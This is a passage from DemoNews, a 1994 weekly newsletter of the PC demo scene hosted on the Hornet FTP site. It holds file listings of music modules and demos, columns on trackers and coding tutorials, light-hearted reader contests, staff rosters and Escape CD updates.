d_scribe.lha  /songs/mod             D'Scribe by Sidewinder
intheeye.lha  /songs/mod             In The Eye by Sidewinder
merengue.zip  /songs/mod             Nunu by Ammirata?
neverend.lha  /songs/mod             Neverend by Sidewinder
onemans .lha  /songs/mod             One Man by Sidewinder
raiders .lha  /songs/mod             Raiders by Sidewinder
2k-nitro.zip  /songs/s3m             Nitrogab by Kookie Kontrol
ambi-ank.zip  /songs/s3m             Alive & Kickin' by Replay
ambi-cau.zip  /songs/s3m             Caution by KodeXmode
ambi-kep.zip  /songs/s3m             Keep Marching by KodeXmode
ambi-psy.zip  /songs/s3m             Psycho by KodeXmode
ambi-zs .zip  /songs/s3m             Setha Strain by KodeXmode
ambiapoc.zip  /songs/s3m             Apocalypse I by KodeXmode
ambistar.zip  /songs/s3m             When Stars Colide by KodeXmode
ambititn.zip  /songs/s3m             Titan's Hold by KodeXmode
funkyatg.zip  /songs/s3m             Funky by ATG
kalumet .zip  /songs/s3m             Das Kalumet by Humaniod
march   .zip  /songs/s3m             March of the Pigs by Buckster
movebody.zip  /songs/s3m             Move Your Body by Anticapella
never   .zip  /songs/s3m             Never by Kerry Ho
n-f_murd.arj  /songs/s3m             Murdered Fingers 1-3 by N-Factor
nogood  .zip  /songs/s3m             No Good (Start the Dance) by Prodigy
sunrise .zip  /songs/s3m             Sunrise in Dreamland by Ng Pei Sin
vivvisit.zip  /songs/s3m             Vivid Visitor by Bolleke
dcult-is.zip  /songs/ult             DC by Syxx

DELETED
  -no description-   megaem  .zip
  -cleanout-         _1final .zip  30be-klf.zip  aminpast.zip  aris-klf.zip
                     continum.zip  destruct.zip  distant .arj  donut   .arj
                     elec-o  .zip  gpln-klf.zip  lgmn-klf.zip  loomdead.zip
                     lostalon.zip  meanmean.zip  midbreed.zip  musigenr.zip
                     nevrlost.zip  nitedesp.zip  odyssey .zip  piano   .zip
                     prophecy.zip  seperate.zip  suct-klf.zip  time.sites
  -old version-      cmod120 .zip  m4w210sx.zip

* We do not have enough room on hornet to have a sample library section.  As
  a result, this file will have to be deleted soon, so get it now.

--------------.
| --ART/ANSI-- | (all locations start with /pub/msdos/demos/...)
`--------------'

We have an ANSI maintainer--cavalier@shadow.net.  He usually posts his
comments within the "/incoming/ansi" directory.

----------.
| --CODE-- |  (all locations start either /demos/programming or /demos/code)
`----------'
The /programming directory will be reorganized and slowly moved to the /code
directory by me, Snowman.

xfonter .arj  /code/font             Fonter - Font Editor for Xlib
pmode305.zip  /code/pmode            PMODE v3.05 DOS Extender 1-/23/94 Update
----------.
| --MISC-- |     (all locations start with /pub/msdos/demos/...)
`----------'

chaos941.zip     /diskmags          Text mag devoted to computer dance music.
rhubarb.zip      DELETED            Text ansi zine on tech/music...
rtclas11.arj     DELETED            Keyboard game...highest I got was 125...
                                    Anyone able to beat that?
st-inof.zip      DELETED            Some info about star trek.

==============================================================================
((Section 4...Music Articles by Snowman))
==============================================================================
(GENERAL)
------------------------------------------------------------------------------

Lots of songs uploaded this week.  Check 'em out.

As always, our room online here is very small.  Remember, most songs have a
life expectency of about 1 month or so.

There was a module ripper released this week.  It said "extracts modules from
any demo".  If there is but one demo you can't rip a song from with this
program, then the author has misrepresented the program.  For each upload on
this site, I put a one-line description in the file section of this
newsletter.  If I put down "this program rips songs from ALL demos" and it
turns out not to be true, then I am in effect lying.  Just be careful how you
promote things.

------------------------------------------------------------------------------
(DEMO PRESENTATION AT AKRON UNIVERSITY)
------------------------------------------------------------------------------

[Here is a partial copy of a mass-mailed letter that was around Akron
University this past week.  I did not write it.]

 MEETING!!  MEETING!!  MEETING!!  MEETING!! MEETING!!  MEETING!!
      MEETING!!  MEETING!!  MEETING!!  MEETING!! MEETING!!
 MEETING!!  MEETING!!  MEETING!!  MEETING!! MEETING!!  MEETING!!
      MEETING!!  MEETING!!  MEETING!!  MEETING!! MEETING!!
 MEETING!!  MEETING!!  MEETING!!  MEETING!! MEETING!!  MEETING!!


       DATE:     Wednesday, October 26th, 1994
       TIME:     4:20pm
       PLACE:    Hickory, Gardner Student Center

       COME SEE -- CHRISTOPHER MANN -- A MUST SEE
            " SNOWMAN'S UNDERGROUND DOMAIN "
          THERE ARE TO MANY WORDS THAT DESC. THIS PRESENTATION
          COME AND JUDGE FOR YOUR SELF...

   O YEA.   DID I MENTION FFFFFFFF  RRRRRRR   EEEEEEEE  EEEEEEEE
                          FF        RR    RR  EE        EE
                          FFFF      RRRRRRR   EEEEE     EEEEE
                          FF        RR    RR  EE        EE
                          FF        RR    RR  EEEEEEEE  EEEEEEEE
                  PIZZA AND BEVERAGE.

[Back to Snowman again]

This past week, I gave a presentation on demos/music in the scene for Akron
University's ACM Computer Science Club.  About 20 people showed up, and it
seemed to go well.  There were troubles with the projector so I couldn't play
Crystal Dreams ][ or the Music Contest ][ Final demo.  However, EMF-Verses
brought quite a few chuckles in the Bill Gates section.  I also did my best
to tarnish the image people have of Creative Labs cards.

For those die-hard Demonews readers out there, you will remember that I gave
a similar presentation this past summer for the Canton-Akron-Massilon Users
Group (CAMUG).

------------------------------------------------------------------------------
(NEW MOD SITE)
------------------------------------------------------------------------------
There is a large new MOD reporitory available at:

ftp   : jawbox.pc.cc.cmu.edu
under : /pub/mods

It contains over 1800 MODs, as well as a sprinkling of 669s, S3Ms and other
formats, as well as a variety of players and editors.

==============================================================================
((Section 5...Code Articles by Snowman))
==============================================================================
(GENERAL)

A couple weeks ago, I wrote about 2 books that are very good for coding in
the demo scene: Richard Ferraro's EGA/VGA/SVGA Guide, and Trick of the Game
Programming Gurus.  I have seen them both in many book stores and I want them
very much.  However, both are $45 and I can not currently afford it.  Looks
like I'll have to wait until X-Mas.

------------------------------------------------------------------------------
(EMOTICON 94')
------------------------------------------------------------------------------

You people are crazy!  :)  I announced a goofy little contest last week and
8 people actually submitted entries.

In summary, the goal of EMOTICON 94 was to find a solution to the following:

Problem:  Having a :) at the end of parenthesis really looks confusing.
Example:  This is an odd contest (like I don't know that already :))

Here are the replies:

[FireLight] - Snowman's Personal Favorite

hey, i think there are a few ways to fix your :) smiley face in a
pair of brackets..

one - put a space after it (hello :) )
or 2.. just banner it ie.

          #      ##
         ###       #
          #         #
(hello              # )
          #         #
         ###       #
          #      ##

[JHF]

Just add a few spaces after the ) to set it off from the smiley. e.g.
Hey I think this is cool! (if you like this that is :)  )

[Eric (Handleless)]

That's simple, there are two solutions:

1. use :> instead of :)
      example:  (sample message :>)  <----that still looks funny.
2. use the :) as part of the parenthesis.
      example:  (sample message :)

or if you must use parenthesis, space one or more times before closing:
(sample message :) )

[Lord Debugger]

Here are my proposals:

1. use rather smiley for left-handed people: (blah, blah, blah (: )
2. use standard smiley but put space between the last char of the smiley and
the closing parenthesis: (blah, blah, boo :)) )

[Catrin, F.  Chile]

We can turn the face to the other side (like this (-: ). Also the mouth can
be changed for a (I don't know how to say 'bigote' :-}). Or like in math, for
avoiding confusion with parenths, use rectangular parenths on the outer side
<Damn old IBM terminal, but you can imagine this or no?  :) >.  A childish
smily face can be used too :-p ).  Or combine two alternatives together
<like this (: >

[Bruno Schneider]

I close the parenthesis before the smily (just as simple as walking
forward) :)

[Nastirth / RadioActive Brains]

My solution to your problem is just to use closed parentethis instead of the
open ones [just like this :-)].

[Daniel Potter]

Here's my solution: (This is some text :)
That's what i've always done :))


[Back to Snowman]

All that I have to say is I must have way too much free time on my hands to
announce a contest like this.  (I won't comment about what it means if you
          #      ##
         ###       #
          #         #
entered             # )
          #         #
         ###       #
          #      ##

------------------------------------------------------------------------------
(STUPID CONTEST 2)
------------------------------------------------------------------------------

                              .----------------.
                             | STUPID CONTEST 2 |
                              `----------------'

This weeks stupid contest centers around text descriptions (you know, those
things your supposed to upload with your file).

Has anyone ever seen a description larger than the file it was refering to?
Look for them on any FTP, BBS, etc. and send your discovery to me.  Next week
I will post them.

Imagine the prestige of winning Stupid Contest 2!  Your girlfriend, your
parents, and even your pets will look up to you with awe at your remarkable
talent.  :)

Prizes include a Gravis Ultrasound and a lot of BBS subscriptions....oh wait!
Those were the prizes to Composer's Competition.  I guess you'll just have
to be happy with recognition in DemoNews.

==============================================================================
((Section 6...ESCAPE Demo/Music CD))
==============================================================================

Check /pub/msdos/demos/incoming/democd for UPDATES and information.
And YES, I do occasionally update this directory.

All the stuff should be at 3M by now...figure 2 weeks for printing and
1 week for the first batch of CD's.  Yep...my time estimates were 1 month
off when I said mid October.

==============================================================================
((Section 7...Advertisements))
==============================================================================

==============================================================================
((Section 8...Top 25 Downloads))
==============================================================================

Not this week.  When the sys admin gets it fixed you will KNOW...we've had
our "C" program ready to roll out the statistics for months.

==============================================================================
((Section 9...Misc))
==============================================================================

==============================================================================
((Section 10...Closing))
==============================================================================

[From Snowman]

Boo!  I didn't have anything else scary to add this week, so I guess this will
have to suffice.

[Dan]

HAPPY HALLOWEEN

SCARY MOVIES are always fun to watch.  The spookier the better...like
HALLOWEEN III--which had nothing to do with the previous two and Michael
Myers--where an Evil person creates MASKS that end up killing people when
they watch his TV commercial on Halloween.  I've always wondered what would
happen in a fight between Freddy Kruger and Jason V. (Friday the 13th fame).
Some of my more favorite "Horror" movies include EVIL DEAD ][, Jacobs Ladder,
Body Parts, Hellraiser, Creepshow, Maxmimum Overdrive (and most S. King
movies), The people under the stairs, the Friday the 13th series and the
like.  Most that make the movie theatres are decent and those that don't...
well, sometimes those are even better.

Perhaps the scariest thing is that our society seems to be getting more
violent and perhaps some day these so called HORROR movies won't be such
far fetched "fantasies" after all.  Think about it...does TV influence
people?  TV is VERY big here in the states...Europeans probably have a
hard time understanding that.  CABLE bypasses 97% of homes here in the US
with 60+% subscribed to some cable service.  We don't get a mere 4 channels
here...we get 40+ and there is almost always something on.  More power
to YOU if you can LIVE without a TV...it is a powerful drug...a plug in drug.

Here in the US--probably unlike most countries--we actually CELEBRATE
OCTOBER 31st.  Kids dress up in costumes and go from door to door saying
"Trick or Treat" and get candy...amazing huh.  I believe I stopped
trick or treating in my early teens but man...the candy you could get!!!
Usually after that two to three hour of going from door to door you
could collect enough candy (10+ lbs) to last MONTHS.  The best part is it
is free and you get a WIDE variety of candy you would never normally buy.
Carving Pumpkins, wearing black, and dressing up are all apart of the
custom.  It is a great holiday though no one gets off work as if it were
a holiday--funny huh.  So put on your costume, get your self some DRY ICE and
bring out your candy cause the kids are coming tomorrow.

Enough talk for this issue. Remember to pray for those DEAD souls like our
pal John Candy who was born Oct 31, 1950 and would have been 44 years old
tomorrow.

My cat Boo says BOO!

Orange & Black,

dmw@eng.ufl.edu
---------------------------------------------------------End-of-Demo-News-#68-

-Start-of-Demo-News-#69-------------------------------------------------------
   ___________  _________________ ____  ____________
   \_______   \/    __________   |    \ \________   \     November 6, 1994 -
   _____ \_    \    __)___/            \/    \__/    \    November 12, 1994
 _/     \_/     \         \_    :_:     \_            \_
 \______________/__________/____| :______/_____________/      ISSUE #69
     _________  _______________ ___ ___  ______________
    /    _    \/    __________ |   |   \/  ___________/      Produced at
   /     |     \    __)___/    :   :    \_______    \          HORNET,
 _/      |      \_        \_     _       \_    |     \_    ftp.eng.ufl.edu
 \_______|_______/_________/_____|________/___________/

==============================================================================
                   .--- .---.      ----- .---      ----- .---
                   |    |   | |\ |   |   |___ |\ |   |   |___
                   |    |   | | \|   |   |    | \|   |       |
                   `--- `---'            `---            `---'
==============================================================================
 Section  1........Standard Information | Section  5...........Coder's Corner
 Section  2.....................General | Section  6..................Demo CD
 Section  3.......................Files | Section  7.....................Misc
 Section  4...........Musician's Corner | Section  8..................Closing

==============================================================================
((Section 1...Standard Information))
==============================================================================
      DemoNews is a weekly publication dedicated to the demo scene.  It is
  produced at the Internet FTP site ftp.eng.ufl.edu (aka WASP or HORNET).
  This newsletter focuses on all aspects of demos and demo-making (including
  music, art, and coding).  ALL are welcomed to contribute articles, rumors,
  advertisements, etc.

  Officially:

         Site Name     : Hornet or Wasp
         Address       : hornet.eng.ufl.edu (128.227.116.7)
                         raptor.eng.ufl.edu (128.227.116.25)
         Location      : Florida, USA
         System E-Mail : dmw@eng.ufl.edu

  There are currently four active demo-operators at this site:

         Name                 Position   Address
         -------------------  ---------  -----------------------
         Dan Wright           *GENERAL*  dmw@inca.gate.net
         Christopher G. Mann  GENERAL    r3cgm@dax.cc.uakron.edu
         Mike                 GENERAL    weis@elf.stuba.sk
         Jason (Cavalier)     ANSI       cavalier@shadow.net

  This site is mirrored by the following ftps:

         FTP Name              IP Address      Country
         --------------------  --------------  ---------
         ftp.uwp.edu           131.210.1.4     USA
         ftp.luth.se           130.240.18.2    Sweden
         ftp.sun.ac.za         146.232.212.21  S. Africa
         ftp.uni-erlangen.de   131.188.2.43    Germany
         ftp.uni-paderborn.de  131.234.10.42   Germany
         ftp.cdrom.com         192.216.191.11  USA

You can subscribe to this newsletter by mailing "listserver@oliver.sun.ac.za"
and putting "subscribe demuan-list your_real_name" in your message.

The listserver is what sends out this newsletter every SUNDAY morning.
kimba@it.com.au is the keeper of the listserver.

For those who use the GUI environment check out our DN.HMTL in the
/demos/news directory.  The URL is ftp://ftp.eng.ufl.edu/demos/news/DN.HTML
If anyone wants to do a graphic logo for this please get in touch.

==============================================================================
((Section 2...General))
==============================================================================
(BIG WEEK FOR DEMONEWS)
------------------------------------------------------------------------------
Hello everyone, this is Christopher G. Mann here.  This week, I have taken it
upon myself to assemble this newsletter.  In the past, Dan has done most of
the work.  I would just send my articles to him Saturday afternoon and by
that night he would have the whole thing ready to go out.  However, Dan is
leaving the "scene" in a few weeks and the responsibility of putting DemoNews
together will fall on my shoulders.  As such, this is my first try and I can
not promise that everything will look good.

Here are some plans I have for Hornet once the big transition is made:

    -review of music players, trackers, and utilities in the style of the
        demo reviews
    -DEMOBOOK, a collection of addresses and info from people in the scene
    -improved links > someone will be assigned to handle all of the links on
        this site
    -code expert > I'll try to find a really knowledgeable coder who can
        contribute articles and answer questions about source code in the
        "scene".  If you are one, or know one, let me know...
    -the /code directory will be reviewed and detailed explanations will be
        given to the source code within

------------------------------------------------------------------------------
(HORNET, THE NEW TEAM)
------------------------------------------------------------------------------
The following people have offered to help out with HORNET once Dan leaves.

                 PERSON           ADDRESS
                 --------------   -------------------------------
             1.  Andrew Younger - aiy@mundil.cs.mu.OZ.AU
             2.  Brenton Swart  - bswa1595@pilot.stu.cowan.edu.au
             3.  Burning Chrome - bchrome@rci.ripco.com
             4.  Ryan Cramer    - rcramer1@mason1.gmu.edu
             5.  Ryan Schwartz  - dspyre@usis.com
             6.  Styros         - iq23@jove.acs.unt.edu

I will need information about each person on this list so that I can assign
duties appropriate to your area.  It would do no good to assign a coder to
review music trackers...

1. Andrew Younger - The only information I have on you is that you offered
                    me a MC][ distro site and tried to find me a recording
                    studio for the Escape CD.
2. Brenton Swart  - I have no information for you.  :(
3. Burning Chrome - You were one of the two artists for the MC][ final demo
                    and run the Piracetam (did I spell that right?) BBS in
                    Florida.  Your area of experience seems to be in music
                    and graphics.
4. Ryan Cramer    - You are one of my CORE friends in the scene.  You are a
                    musician and run the Data Connection BBS in Virginia.
                    I will probably ask you to write a weekly article for
                    "Musician's Corner" in this newsletter.
5. Ryan Schwartz  - I have no information for you.  :(
6. Styros         - I have no information for you.  :(


If you are on this list, then please write me and tell me information that
would help me decide what to ask you to do.  Even if I know you well, please
write and tell me about complications or ideas you will have.

Different tasks will include being the "Links Manager", reviewing demos,
music files, source code, and handling mail for this site.

If you are not on this list but would like to be, write me back at:
        r3cgm@dax.cc.uakron.edu

==============================================================================
((Section 3...Files))
==============================================================================
FILENAME.EXT  LOCATION               DESCRIPTION
------------------------------------------------------------------------------
-----------.
| --DEMOS-- |    (all locations start with /pub/msdos/demos...)
`-----------'
1infect.arj   /alpha/NEW             N-Factor's WIRED'94 party release. GUS.
btw.zip       /alpha/NEW             Older Cpacala intro. GUS.
chyztro.zip   /alpha/NEW             Channel Mag preview intro by GRIF. GUS.
contro.zip    /alpha/NEW             Purple's contact intro. GUS/SB.
llama.arj     /alpha/NEW             llama Olimpicia.  Just a Flame / Ispanic.
once-lsd.zip  /alpha/NEW             Laserdance's 2nd place WIRED intro SB.

-----------.
| --MUSIC-- |    (all locations start with /pub/msdos/demos/music...)
`-----------'
ciadsk05.zip  /disks                 CiA Music Disk #5
cn-cia03.zip  /disks                 Cerebral Neurosis Solo Disk 3 (Part 1)
cs_disk .zip  /disks                 MusicDisk by CHAOS of SP/ET
epidem-1.zip  /disks                 Epidemic Music Disk (part 1 of 3)
epidem-2.zip  /disks                 Epidemic Music Disk (part 2 of 3)
epidem-3.zip  /disks                 Epidemic Music Disk (part 3 of 3)
into-klf.zip  /klf                   Into My Universe by Maelcum
convert .zip  /programs/convert      Converts some different samples / songs
stx2stm .zip  /programs/convert      Converts STX modules back to STM
incadrea.zip  /songs/mtm             Inca Dream by Mute
ambiapo2.lzh  /songs/s3m             Apocalypse ][ by KodeXmode
ambipont.zip  /songs/s3m             Pointzer Orchastra by KodeXmode
anx1    .zip  /songs/s3m             Untitled by Echo M.
anx2    .zip  /songs/s3m             Untitled by Echo M.
anx3    .zip  /songs/s3m             Untitled by Echo M.
configur.zip  /songs/s3m             Configure by The Charlatan
free-had.zip  /songs/s3m             Freebase by Hadji
genhance.zip  /songs/s3m             Genetic Enhancement by Mute
jims3m  .zip  /songs/s3m             Jim Morrison Ode by Kevin (cs41sb08)
mnreson .zip  /songs/s3m             Mnemonic Resonance by M. Janiszewski
pro-sjam.zip  /songs/s3m             Pro Strawberry Jam by Protocol
quickj  .lzh  /songs/s3m             Quick Journey by Akintunde Omitowoju
sob-had .zip  /songs/s3m             Son of a Bitch by Hadji
aftermid.zip  /time                  After Midnight by Fortunato

DELETED
  -cleanout-      dance4  .zip   d_d_ster.zip   fluid   .zip   fragsoul.zip
                  jackedin.zip   lastdanc.zip   motpigs .zip   ragdepth.lzh
                  rendan  .zip   sky_marj.zip   sky_mosq.zip   sky_nwpr.zip
                  sombay  .zip   tl-demon.zip

--------------.
| --ART/ANSI-- | (all locations start with /pub/msdos/demos/...)
`--------------'

We have an ANSI maintainer--cavalier@shadow.net.  He usually posts his
comments within the "/incoming/ansi" directory.

----------.
| --CODE-- |     (all locations start with /pub/msdos/demos/code...)
`----------'
3dvect39.zip  /code/graph/3d         3D Vector Engine...tons of stuff
setmode .zip  /code/graph/images     Setmode1.0 use 320*200 progs w/dfrn resn
v3dt090 .zip  /code/graph/library    3DTOOLS v0.90b - C++ 3d engine with libs
vtime110.zip  /code/graph/vidcard    A Video-Card timer measuring performance

DELETED
  -unrelated-     shadesav.zip  - Screen Saver
                  unchp14 .zip  - DOS uuencode/uudecode helper

----------.
| --MISC-- |     (all locations start with /pub/msdos/demos/...)
`----------'
dask01  .zip  /diskmags              DASK mag issue #1.  Not much here. GUS.
slave14 .zip  /diskmags              LiTHiUM's ALT-1 issue #14. NEW LAYOUT!
bitmov95.txt  DELETED                Midi music contest in Italy Mar. '95.
jhd-1194.zip  DELETED                A "art" pack/mag.  No place to fit.
nadd_v10.zip  DELETED                New age demo database....corrupt.

==============================================================================
((Section 4...Musician's Corner by Snowman))
==============================================================================
(GENERAL)
------------------------------------------------------------------------------
There were a couple of recent releases that I have been impressed with.  Both
are by CapaCala.

First is CapaMod 2.01.  It is the best MOD/S3M player out there (IMO), and
was used as the voting software for Music Contest ][.  The .s3m support is
still a bit buggy, but the .mod play-quality is very good.

Second is BTW, a new intro by CapaCala.  Its not the most complex intro I've
ever seen, but the music is really cool.

Before I forget, be sure to check out that Acme CLAIR intro.  Its like BTW in
the respect that it isn't very complicated, but the music kicks.

------------------------------------------------------------------------------
(NO ASM 94 MUSIC)
------------------------------------------------------------------------------
Many people have written me trying to find the assembly 94 music, so I will
try to clear the matter up here.

The Assembly 94 music was originally kept for about a month and a half.
However, due to space restrictions, it was no longer possible to keep them
online.

If you are looking for them, our mirror site ftp.uwp.edu might be a good
place to start.  They seem to keep files we delete for a while.  If you can't
find it there, then your next bet would be to check out ARCHIE.  I'm sure
there are some final results lists of ASM94 still floating around.  Just
grab one, make a macro, and search for each song on archie while you go eat
dinner or something...

==============================================================================
((Section 5...Coder's Corner by Snowman))

==============================================================================
(PKLITE vs. LZEXE)
------------------------------------------------------------------------------
I would like to open a discussion on what the best .exe compressor is out
there.  Personally, I know very little about this area and I have only used
PKLITE and LZEXE a few times.  However, I'll bet that there are a few coders
out there who have some thoughts on the matter.

What do you think?

------------------------------------------------------------------------------
(PASCAL/C++ DEMO TUTORIAL)
------------------------------------------------------------------------------
Most dedicated readers of DemoNews know that I am a very big fan of Denthor's
Pascal demo tutorial programs.  Lately, I've been converting the source and
documentation to C++.  This should increase the number of people who will
find these tutorials useful.

[How to get the tutorials]

Well, Hornet has most of them online, under /code/graph/tutor.  However, you
can write to Denthor directly and get them:

**                                                                        **

This is the list of subjects lines for the sending of files over email. This
will be done automatically. All files willbe uuencoded, see if it is on your
UNIX server or grab the dos version off ftp of the Night Owl CD's

All the files are copyright Asphyxia, and permission must be obtained from
denthor@beastie.cs.und.ac.za before using them in any publication (paper or
electronic) etc. They may however be distributed freely on BBS's as long as
no modifications are made. I will expand the list continually as soon as I
finish more trainers etc, and I will also be placing some of our smaller
intros here too.

Email denthor@beastie.cs.und.ac.za with the following subjects :

request-tut-1
request-tut-2
request-tut-3
request-tut-4
request-tut-5
request-tut-6
request-tut-7
request-tut-8
request-tut-9
request-tut-10
request-tut-11
request-tut-12
request-tut-13
request-tut-14
request-tut-15
request-tut-16                   ; These are the trainers...
request-extras                   ; Wormie, coppers etc ...
request-texter                   ; Graphics font utility

**                                                                        **

I highly suggest you check these tutorials out.  They are extremely good
quality.

------------------------------------------------------------------------------
(STUPID CONTEST 2 RESULTS)
------------------------------------------------------------------------------
Last weeks stupid contest centered around text descriptions (you know, those
things your supposed to upload with your file).  Had anyone ever seen a de-
scription larger than the file it was refering to?  This week we post the two
entries received...

[Entry #1]

             Here's my WONDERFUL entry to SC][!

---===<<<(((||| EXPLOSIV.COM aNd EXPLOSIV.DOC |||)))>>>===---

This program is a screen saver from around 1990 that
was in "Stupid PC tricks" by somebody or another...

The executable is 9192 bytes and the documentation is
11385, making for a description that is, yes, 20%
bigger than the EXE!

   --PeriSoft =<Musician / GFX / CodE>= [Epinicion / Interamnia]

[Entry #2]

Here's an entry to the Stupid Contest 2 in DemoNews :)

It's a file called nilv-nen.zip (I found it in my hard disk in a filearea
of my offlined BBS). The file features the 2400 byte executable, which is
supposed to be the actual product. The file_id.diz description file is
9600 bytes long! The third file is called loput.doc, which is ..hmm.. 1200
bytes long, featuring a list of the other modem bps speeds (1200, 2400,
etc., get it? :) ..

   / Antti Piirainen a.k.a.        / email: piiraine@lut.fi
  /  Addict/Topaz Beerline        /  (mail your votes, etc.)
 /   Yahoo disk mag chief editor /   WWW..: http://www.lut.fi/~piiraine

[Note]

The Stupid Contests will be put away for awhile.  Last week, I suddenly
realized that they were, in fact, very stupid.  In place of the Stupid
Contests, I will probably invite more open discussion (see PKLITE vs.
LZEXE above).

==============================================================================
((Section 6...ESCAPE Demo/Music CD))
==============================================================================
[From Christopher G. Mann]

Royal, Stony, and I are just finishing up the Escape intro.  It should be out
Sunday night (November 6th, 1994).

[From Dan Wright]

Word has it the printing of the inserts will be completed next week
and the complete CD package will get to me Thanksgiving week (20-26).
By this time next week I should know all the details to write up an
INFO letter which shall be sent to all those on my reserve list.  Stay
tuned for the latest...

==============================================================================
((Section 7...Advertisements))
==============================================================================

   Katharsis!ASCII - everybody's favorite ascii group - would like to
   annonce a new service for it's fans.

   I'm starting up a mailing list of people who want to recive the newest
   kts!ascii pack as soon as it comes out, straight to their mailbox. All
   you have to do is send me a message at zynit@maloka.waw.pl, and i'll add
   you to the mailing list. You will then get a uuencoded pack as soon as it
   is released... ok?

   so, remember: mail me at zynit@maloka.waw.pl to get on the the list.

   tinyz [kts!ascii founder]

   ps. Back packs are avalible too!

==============================================================================
((Section 8...Closing))
==============================================================================
Well, these Demonews articles are eating up more and more of my time.  I hope
you enjoy reading them.  I'll leave you with a quote like Dan usually does.
It comes from Book 1 of Paradise Lost:

        "Better to reign in hell than serve in heaven"  - Milton

Best Regards,
    Christopher G. Mann (aka Snowman)

r3cgm@dax.cc.uakron.edu
---------------------------------------------------------End-of-Demo-News-#69-

-Start-of-Demo-News-#70-------------------------------------------------------
                        (SPECIAL BLOCKBUSTER EDITION)
   ___________  _________________ ____  ____________
   \_______   \/    __________   |    \ \________   \     November 13, 1994 -
   _____ \_    \    __)___/            \/    \__/    \    November 19, 1994
 _/     \_/     \         \_    :_:     \_            \_
 \______________/__________/____| :______/_____________/      ISSUE #70
     _________  _______________ ___ ___  ______________
    /    _    \/    __________ |   |   \/  ___________/      Produced at
   /     |     \    __)___/    :   :    \_______    \          HORNET,
 _/      |      \_        \_     _       \_    |     \_    ftp.eng.ufl.edu
 \_______|_______/_________/_____|________/___________/

==============================================================================
                  .--- .---.      ----- .---      ----- .---
                  |    |   | |\ |   |   |___ |\ |   |   |___
                  |    |   | | \|   |   |    | \|   |       |
                  `--- `---'            `---            `---'
==============================================================================

    Section  1.............Standard Information --> Who Are We?
                                                    Site Specifics
    Section  2..........................General --> Answers to Mail
                                                    Hornet, the New Team
                                                    How to Request DemoNews
    Section  3......................New Uploads --> New Files for the Week
    Section  4.................Musicians Corner --> Epidemic Music Disk
                                                    Fast Tracker ][
                                                    Ambience
                                                    MOD4WIN Thoughts
                                                    Dynamic Tracker Response
    Section  5....................Coders Corner --> ASM94 4k-intro Info
    Section  6....................Escape DemoCD --> Error in the Intro
    Section  7...................Advertisements --> Reckless Life BBS
                                                    TP94 Holland Bus-Trip
    Section  8....................Miscellaneous --> New Projects
    Section  9.................Closing Comments --> Quote for the Week

==============================================================================
((Section 1...Standard Information))
==============================================================================
      DemoNews is a weekly publication dedicated to the demo scene.  It is
  produced at the Internet FTP site ftp.eng.ufl.edu (aka WASP or HORNET).
  This newsletter focuses on all aspects of demos and demo-making (including
  music, art, and coding).  ALL are welcomed to contribute articles, rumors,
  advertisements, etc.

  Officially:

        Site Name     : Hornet or Wasp
        Address       : hornet.eng.ufl.edu (128.227.116.7)
                        raptor.eng.ufl.edu (128.227.116.25)
        Location      : Florida, USA
        System E-Mail : dmw@eng.ufl.edu

  There are currently 11 active demo-operators at this site:

        Name                      Position    Address
        ------------------------- ----------- -------------------------------
  <GEN> CHRISTOPHER G. MANN       COORDINATOR r3cgm@dax.cc.uakron.edu
        Dan Wright                (none)      dmw@inca.gate.net
        Mike                      ???         weis@elf.stuba.sk
        Styros                    LINKMAN     iq23@jove.acs.unt.edu
<DEMOS> Brenton Schwartz (Zenith) DREVIEW     bswa1595@pilot.stu.cowan.edu.au
<MUSIC> Ryan Cramer               MARTICLE    rcramer1@osf1.gmu.edu
        Per-Ivar Knutsen          MREVIEW     perk@stud.cs.uit.no
 <CODE> Grant Denthor             CARTICLE    denthor@beastie.cs.und.ac.za
        Diego Roversi             CREORG      piu1766@cdc8g5.cdc.polimi.it
        Andy Younger (King Tech)  CMOVER      aiy@mundil.cs.mu.OZ.AU
        David Thornley (Metal)    CREVIEW     dthorn@gco.apana.org.au
 <ANSI> Jason (Cavalier)          AGENERAL    cavalier@shadow.net

  This site is mirrored by the following ftps:

        FTP Name              IP Address      Country
        --------------------  --------------  ---------
        ftp.uwp.edu           131.210.1.4     USA
        ftp.luth.se           130.240.18.2    SWEDEN
        ftp.sun.ac.za         146.232.212.21  S. AFRICA
        ftp.uni-erlangen.de   131.188.2.43    GERMANY
        ftp.uni-paderborn.de  131.234.10.42   GERMANY
        ftp.cdrom.com         192.216.191.11  USA

  You can subscribe to this newsletter by mailing listserver@oliver.sun.ac.za
  and putting "subscribe demuan-list your_real_name" in your message.

  The listserver is what sends out this newsletter every SUNDAY morning.
  kimba@it.com.au is the keeper of the listserver.

  For those who use the GUI environment check out our DN.HMTL in the
  /demos/news directory.  The URL is ftp://ftp.eng.ufl.edu/demos/news/DN.HTML
  If anyone wants to do a graphic logo for this please get in touch.

==============================================================================
((Section 2...General))
==============================================================================
This issue is about 45k.  I apologize.  There was so much material I wanted
to put in here and I didn't even put in the /code uploads or the NAID demo-
party review.

However, I think that this huge DemoNews is a sign of some good things to
come.  Oh well... you might be better off downloading this issue and looking
at it with your favorite text editor.  Anyone want to make a front end for
this newsletter?

Answers to mail:

> If you're not too annoyed at the mention of this, do you have any idea if
> there ever were/will be CC1 results?  Someone I knew once saw something in
> demonews about a file that looked strangely like CC1 results... Can you
> shed any light?

Mike Phillips wrote me a couple of months back (when I was getting ready to
finish up Music Contest ][) and told me that he only needed two more voting
forms and then he would finish up the contest.  Personally, I do not believe
he will ever finish the contest.

Should HORNET finish up Composer's Contest?  I am willing to accept input
on the subject.  If enough people want to, I will set up some kind of voting
system, repost all of the CC1 entries, and get this thing finished.

> About the Pascal demo tutorials that you're converting to C++, when will
> they be out and where will I find them on hornet?

The first is done and should be out next week.  However, I was having some
problems converting the second one.  When this is cleaned up, the rest of the
tutorials should be converted in a short period of time (I have a month off
school for Christmas break).

> I subscribe to Demo News so that I can get to hear about new demos
> coming out. I don't want to download every one to check it out.
> What is the easiest way of finding out how good new demos are?
> Is there some way you could incorporate a rating in demo news?

I'm thinking that each DemoNews should contain ratings of the demos uploaded
the previous week.  However, there are SO many changes being made right now,
I think that I will let things cool down before more changes are made.

------------------------------------------------------------------------------
(HORNET, THE NEW TEAM)
------------------------------------------------------------------------------
Often times DemoNews is the easiest way to respond to all of the mail I get.
If you have written me about helping out with Hornet, READ THIS SECTION.

Who Does What:

<<GENERAL>>

  Name    : Christopher G. Mann (Snowman)
  Address : r3cgm@dax.cc.uakron.edu, dmw@eng.ufl.edu
  Title   : COORDINATOR
  Info    : I am in charge of coordinating activities here at Hornet.  I put
